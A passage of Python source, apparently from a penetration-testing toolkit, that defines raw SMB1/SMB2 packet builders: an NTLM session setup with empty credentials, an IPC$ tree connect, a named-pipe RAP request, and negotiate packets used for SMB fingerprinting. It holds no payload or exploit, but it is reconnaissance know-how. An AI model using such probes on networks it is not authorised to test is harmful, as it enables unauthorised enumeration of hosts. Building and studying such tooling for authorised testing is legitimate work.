("NLMPAuthMsgRandomSessionKeyMessageMaxLen","\x00\x00"),
("NLMPAuthMsgRandomSessionKeyMessageBuffOffset","\x55\x00\x00\x00"),
("NLMPAuthMsgNtNegotiateFlags","\x05\x8A\x88\xa2"),
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
("NegTokenInitSeqMechMessageVersionLow","\x01"),
("NegTokenInitSeqMechMessageVersionBuilt","\x28\x0a"),
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
("NLMPAuthMsgNtDomainName",""),
("NLMPAuthMsgNtUserName",""),
("NLMPAuthMsgNtWorkstationName",""),
("NLMPAuthLMChallengeStr", "\x00"),
("NLMPAuthMsgNTLMV1ChallengeResponseStruct",""),
("NLMPAuthMsgNTerminator",""),
("nativeOs","Windows 2002 Service Pack 3 2600"),
("nativeOsterminator","\x00\x00"),
("nativelan","Windows 2002 5.1"),
("nativelanterminator","\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["NLMPAuthMsgNtUserName"] = self.fields["NLMPAuthMsgNtUserName"].encode('utf-16le').decode('latin-1')
self.fields["NLMPAuthMsgNtDomainName"] = self.fields["NLMPAuthMsgNtDomainName"].encode('utf-16le').decode('latin-1')
self.fields["NLMPAuthMsgNtWorkstationName"] = self.fields["NLMPAuthMsgNtWorkstationName"].encode('utf-16le').decode('latin-1')
self.fields["nativeOs"] = self.fields["nativeOs"].encode('utf-16le').decode('latin-1')
self.fields["nativelan"] = self.fields["nativelan"].encode('utf-16le').decode('latin-1')
CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])+str(self.fields["NLMPAuthMsgNTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])
SecurityBlobLen2 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])
SecurityBlobBCC = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])+str(self.fields["NLMPAuthMsgNTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
CalculateUserOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])
CalculateDomainOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
CalculateWorkstationOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])
CalculateLMChallengeOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])
CalculateNTChallengeOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])
## Packet len
self.fields["andxoffset"] = StructWithLenPython2or3("<i", len(CompletePacketLen)+32)[:2]
##Buff Len
self.fields["securitybloblength"] = StructWithLenPython2or3("<i", len(SecurityBlobLen))[:2]
##Complete Buff Len
self.fields["bcc1"] = StructWithLenPython2or3("<i", len(SecurityBlobBCC))[:2]
## Guest len check
self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3("<i", len(SecurityBlobLen)-2)[:1]
self.fields["AsnSecMechLen"] = StructWithLenPython2or3("<i", len(SecurityBlobLen)-4)[:1]
self.fields["ChoosedTagLen"] = StructWithLenPython2or3("<i", len(SecurityBlobLen)-6)[:1]
self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3("<i", len(SecurityBlobLen)-8)[:1]
##### Username Offset Calculation..######
self.fields["NLMPAuthMsgNtUserNameBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateUserOffset))
self.fields["NLMPAuthMsgNtUserNameLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthMsgNtUserName"])))[:2]
self.fields["NLMPAuthMsgNtUserNameMaxLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthMsgNtUserName"])))[:2]
##### Domain Offset Calculation..######
self.fields["NLMPAuthMsgNtDomainNameBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateDomainOffset))
self.fields["NLMPAuthMsgNtDomainNameLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthMsgNtDomainName"])))[:2]
self.fields["NLMPAuthMsgNtDomainNameMaxLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthMsgNtDomainName"])))[:2]
##### Workstation Offset Calculation..######
self.fields["NLMPAuthMsgNtWorkstationBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateWorkstationOffset))
self.fields["NLMPAuthMsgNtWorkstationLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthMsgNtWorkstationName"])))[:2]
self.fields["NLMPAuthMsgNtWorkstationMaxLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthMsgNtWorkstationName"])))[:2]
##### NT Challenge Offset Calculation..######
self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateNTChallengeOffset))
self.fields["NLMPAuthMsgNtChallengeResponseLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])))[:2]
self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])))[:2]
##### LM Challenge Offset Calculation..######
self.fields["NLMPAuthMsgLMChallengeBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateLMChallengeOffset))
self.fields["NLMPAuthMsgLMChallengeLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthLMChallengeStr"])))[:2]
self.fields["NLMPAuthMsgLMChallengeMaxLen"] = StructWithLenPython2or3("<i", len(str(self.fields["NLMPAuthLMChallengeStr"])))[:2]
######################################################################################################
class SMBTreeConnectData(Packet):
fields = OrderedDict([
("Wordcount", "\x04"),
("AndXCommand", "\xff"),
("Reserved","\x00" ),
("Andxoffset", "\x5a\x00"),
("Flags","\x08\x00"),
("PasswdLen", "\x01\x00"),
("Bcc","\x2f\x00"),
("Passwd", "\x00"),
("Path","IPC$"),
("PathTerminator","\x00\x00"),
("Service","?????"),
("Terminator", "\x00"),
])
def calculate(self):
##Convert Path to Unicode first before any Len calc.
self.fields["Path"] = self.fields["Path"].encode('utf-16le').decode('latin-1')
##Passwd Len
self.fields["PasswdLen"] = StructWithLenPython2or3("<i", len(str(self.fields["Passwd"])))[:2]
##Packet len
CompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Flags"])+str(self.fields["PasswdLen"])+str(self.fields["Bcc"])+str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
self.fields["Andxoffset"] = StructWithLenPython2or3("<i", len(CompletePacket)+32)[:2]
##Bcc Buff Len
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
self.fields["Bcc"] = StructWithLenPython2or3("<i", len(BccComplete))[:2]
class SMBTransRAPData(Packet):
fields = OrderedDict([
("Wordcount", "\x10"),
("TotalParamCount", "\x00\x00"),
("TotalDataCount","\x00\x00" ),
("MaxParamCount", "\xff\xff"),
("MaxDataCount","\xff\xff"),
("MaxSetupCount", "\x00"),
("Reserved","\x00\x00"),
("Flags", "\x00"),
("Timeout","\x00\x00\x00\x00"),
("Reserved1","\x00\x00"),
("ParamCount","\x00\x00"),
("ParamOffset", "\x5c\x00"),
("DataCount", "\x00\x00"),
("DataOffset", "\x54\x00"),
("SetupCount", "\x02"),
("Reserved2", "\x00"),
("PeekNamedPipe", "\x23\x00"),
("FID", "\x00\x00"),
("Bcc", "\x47\x00"),
("Terminator", "\x00"),
("PipeName", "\\PIPE\\"),
("PipeTerminator","\x00\x00"),
("Data", ""),
])
def calculate(self):
#Padding
if len(str(self.fields["Data"]))%2==0:
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["PipeTerminator"] = "\x00\x00\x00"
##Convert Path to Unicode first before any Len calc.
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le').decode('latin-1')
##Data Len
self.fields["TotalParamCount"] = StructWithLenPython2or3("<i", len(str(self.fields["Data"])))[:2]
self.fields["ParamCount"] = StructWithLenPython2or3("<i", len(str(self.fields["Data"])))[:2]
##Packet len
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["PeekNamedPipe"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
self.fields["ParamOffset"] = StructWithLenPython2or3("<i", len(FindRAPOffset)+32)[:2]
##Bcc Buff Len
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
self.fields["Bcc"] = StructWithLenPython2or3("<i", len(BccComplete))[:2]
######################FindSMBTime.py##########################
class SMBHeaderReq(Packet):
fields = OrderedDict([
("Proto", "\xff\x53\x4d\x42"),
("Cmd", "\x72"),
("Error-Code", "\x00\x00\x00\x00" ),
("Flag1", "\x10"),
("Flag2", "\x00\x00"),
("Pidhigh", "\x00\x00"),
("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("Reserved", "\x00\x00"),
("TID", "\x00\x00"),
("PID", "\xff\xfe"),
("UID", "\x00\x00"),
("MID", "\x00\x00"),
])
class SMB2NegoReq(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = StructWithLenPython2or3("<H",len(str(self.fields["Data"])))
class SMB2NegoDataReq(Packet):
fields = OrderedDict([
("StrType","\x02" ),
("dialect", "NT LM 0.12\x00"),
("StrType1","\x02"),
("dialect1", "SMB 2.002\x00"),
("StrType2","\x02"),
("dialect2", "SMB 2.???\x00"),
])
##################################################################
# SMB2 Finger #
##################################################################
class SMB2NegoData(Packet):
fields = OrderedDict([
("separator1","\x02" ),
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
("separator2","\x02"),
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3","\x02"),
("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
("separator4","\x02"),
("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
("separator5","\x02"),
("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
("separator6","\x02"),
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
("separator7","\x02"),
("dialect7", "\x53\x4d\x42\x20\x32\x2e\x30\x30\x32\x00"),
("separator8","\x02"),
("dialect8", "\x53\x4d\x42\x20\x32\x2e\x3f\x3f\x3f\x00"),
])
class SMBv2Head(Packet):
fields = OrderedDict([
("Server", "\xfe\x53\x4d\x42"),
("HeadLen", "\x40\x00"),
("CreditCharge", "\x00\x00"),
("NTStatus","\x00\x00\x00\x00"),
("SMBv2Command","\x00\x00"),
("CreditRequested","\x00\x00"),
("Flags","\x00\x00\x00\x00"),
("ChainOffset","\x00\x00\x00\x00"),
("CommandSequence","\x01\x00\x00\x00\x00\x00\x00\x00"),
("ProcessID","\xff\xfe\x00\x00"),
("TreeID","\x00\x00\x00\x00"),
("SessionID","\x00\x00\x00\x00\x00\x00\x00\x00"),
("Signature","\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
])
def calculate(self):
